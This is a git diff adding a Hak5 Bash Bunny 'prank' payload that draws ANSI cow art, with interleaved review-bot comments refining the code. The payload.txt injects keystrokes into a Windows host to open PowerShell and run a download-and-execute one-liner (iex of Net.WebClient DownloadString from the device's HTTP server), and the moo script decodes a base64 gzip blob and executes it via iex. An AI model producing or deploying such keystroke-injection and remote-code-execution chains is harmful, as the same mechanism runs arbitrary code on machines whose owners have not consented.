diff --git a/payloads/library/prank/Win_PoSH_AnsiSebsCow/moo b/payloads/library/prank/Win_PoSH_AnsiSebsCow/moo
new file mode 100644
index 00000000..0de8e02c
--- /dev/null
+++ b/payloads/library/prank/Win_PoSH_AnsiSebsCow/moo
@@ -0,0 +1,60 @@
+# Ansi art base64 encoded gzip file
+$data = 'H4sIAAAAAAAEAO3aTUrDQBQH8L3gHdLiNYSCgkdw3UVBF1aoBa+QpU2MBUHwLB6lJ9EWC8nMm3kf838tUsmsTOe9/y+TrxYvltVlNRmfn23empMaSPFqNzxiIivjxVg3vqaXGBIQXtBZXJgRW+1QYnNMYCmZuP363G8FCQ0h7XX6
+iVvFyrYD7XZ2rY+3CjPEx4+ZSo16WKclYTlbs58UC+vIGYSqKQwNrLOi32aUheYwoqY3m3Yl/yDmsFX6GdRXF00JNP3mmvyS2UHbfEbRPbFNSHrnmlmRqhN3ZYNK7+9x4bafoBATgnaDbMln1T2xCEspJI1SKCyW7cgEUeZO79Il
+Uhog8dlpbgJgeGa6Q36yd9Sev0o0s/wNqRxph+QzbgbRCQEnyBAogSyX5nYMSi9rht0wR135LE48XokhXcnESzTEw6nkGomMbO4Jy13GwftWnlRzvEx7Z11OTb2GZYiDD7AqT60FvDPbFtUo5bGH9Kou0L/q1YvN5zFUqwDbHnVI
+lMZlezTbNnT2YFlKD6x2UQ3LotY1/jS+gyKu5WfxY+p0WTE/O2BpOaCr7lA0EPBfdxwaAlj4NNvv9pDxXXErxydRToEXhIoBrbJ1yitI6wC+IcrDokZRHl6sLN+9broX6Fhj0Tpxw1ftVtfTxWI2r27v50/V8m5WXT0+VzfTh9lo
+9LNT0CfuWXaGakb3jl6vD2zCU/zXs/HkGzPXN594JwAA'
+
+## Decompress the ansi art
+$binaryData = [System.Convert]::FromBase64String($data)
+$ms = New-Object System.IO.MemoryStream
+$ms.Write($binaryData, 0, $binaryData.Length)
+$ms.Seek(0,0) | Out-Null
+$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]"Decompress")
+$sr = New-Object System.IO.StreamReader($cs)
+$structure = $sr.ReadToEnd()
+iex $structure
+
+Clear-Host
+# Resize window
+1..4 | % {
+try
+{
+ $host.UI.RawUI.WindowSize = New-Object System.Management.Automation.Host.Size 80,47
+}
+catch {}
+}
+
+# Loop each char
+$t | % {$_[0..($_.length)]} | % {
+ # Set colour
+ switch ($_) {
+ "▒" {
+ $c = "Green"
+ $b = "Green"
+ }
+ "░" {
+ $c = "DarkYellow"
+ $b = "Yellow"
+ }
+ "▓" {
+ # to get pink
+ $c = "Red"
+ $b = "White"
+ }
+ "█" {
+ $c = "Black"
+ $b = "Black"
+ }
+ " " {
+ $c = "White"
+ $b = "White"
+ }
+ default {
+ $c = "White"
+ $b = "DarkBlue"
+ }
+ }
+ # Write char
+ Write-Host $_ -NoNewline -ForegroundColor $c -backgroundcolor $b
+}
\ No newline at end of file
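Review bot: The per-line index range `$_[0..($_.length)]` runs one past the end of each art line, because `length` is one beyond the last valid index, so every line yields an extra null element that falls into the `default` branch of the switch; it is probably not visible, but it is a wasted `Write-Host` call and may become an error under strict mode, so `$t | % {$_[0..($_.length - 1)]} | % {` is the safer form. `$t` is not defined anywhere in the visible script, so it presumably comes from the decompressed blob run by `iex $structure`; that contract deserves a comment on the `iex` line, e.g. `# the decompressed blob is PowerShell that must define $t, the array of art lines`. The `$sr`, `$cs` and `$ms` streams are also never closed after `ReadToEnd()`; a `$sr.Dispose()` after the read releases all three. The four `try { ... } catch {}` attempts at resizing the window swallow every failure silently, which is a deliberate best-effort but is worth a one-line comment saying so.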
diff --git a/payloads/library/prank/Win_PoSH_AnsiSebsCow/payload.txt b/payloads/library/prank/Win_PoSH_AnsiSebsCow/payload.txt
new file mode 100644
index 00000000..17c16e9e
--- /dev/null
+++ b/payloads/library/prank/Win_PoSH_AnsiSebsCow/payload.txt
@@ -0,0 +1,38 @@
+#!/bin/bash
+# Title: ANSI Seb's Cow
+# Description: Display an ANSI art Seb's Cow
+# Author: Cribbit
+# Version: 1.0
+# Category: Pranks
+# Target: Windows (Powershell 5.1+)
+# Attackmodes: RNDIS_ETHERNET HID
+# Props: Hak5's Sebs Cow, Audibleblink (Python Server) and Lee Holmes (compression)
+
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+
+# starting server
+LED SPECIAL
+
+# disallow outgoing dns requests so server starts immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
+
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
+
+# attack commences
+LED ATTACK
+QUACK DELAY 200
+RUN WIN Powershell
+QUACK DELAY 500
+QUACK STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/moo\")"
+QUACK ENTER
+LED FINISH
+
diff --git a/payloads/library/prank/Win_PoSH_AnsiSebsCow/readme.md b/payloads/library/prank/Win_PoSH_AnsiSebsCow/readme.md
new file mode 100644
index 00000000..4a58fb47
--- /dev/null
+++ b/payloads/library/prank/Win_PoSH_AnsiSebsCow/readme.md
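Review bot: Neither the `iptables -A OUTPUT -p udp --dport 53 -j DROP` rule nor the backgrounded `python -m SimpleHTTPServer 80` is ever undone, so after `LED FINISH` the device keeps its own DNS blocked and keeps serving the whole payload directory to the host for as long as it stays plugged in. Two lines after `LED FINISH` tear both down: `kill $! 2>/dev/null` (the PID of the `&` job) and `iptables -D OUTPUT -p udp --dport 53 -j DROP`. The `while ! nc -z localhost 80; do sleep 0.2; done` wait is also unbounded, so if port 80 is already taken the payload sits on `LED SPECIAL` forever; a retry counter that exits via `LED FAIL` would make that failure visible instead of silent.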
@@ -0,0 +1,23 @@
+# ANSI Seb's Cow
+- Author: Cribbit
+- Version: 1.0
+- Target: Windows (Powershell 5.1+)
+- Category: Pranks
+- Attackmode: HID & RNDIS_ETHERNET
+- Extensions: Run
+- Props: Hak5's Sebs Cow, Audibleblink (Python Server) and Lee Holmes (Compression)
+
+## Change Log
+| Version | Changes |
+| ------- | --------------- |
+| 1.0 | Initial release |
+
+## Description
+Shows an ansi art image of seb's cow in a powershell window
+
+## Colours
+| Status | Colour | Description |
+| -------- | ----------------------------- | --------------------------- |
+| SETUP | Magenta solid | Setting attack mode |
+| ATTACK | Yellow single blink | Injecting Powershell script |
+| FINISHED | Green blink followed by SOLID | Injection finished |
\ No newline at end of file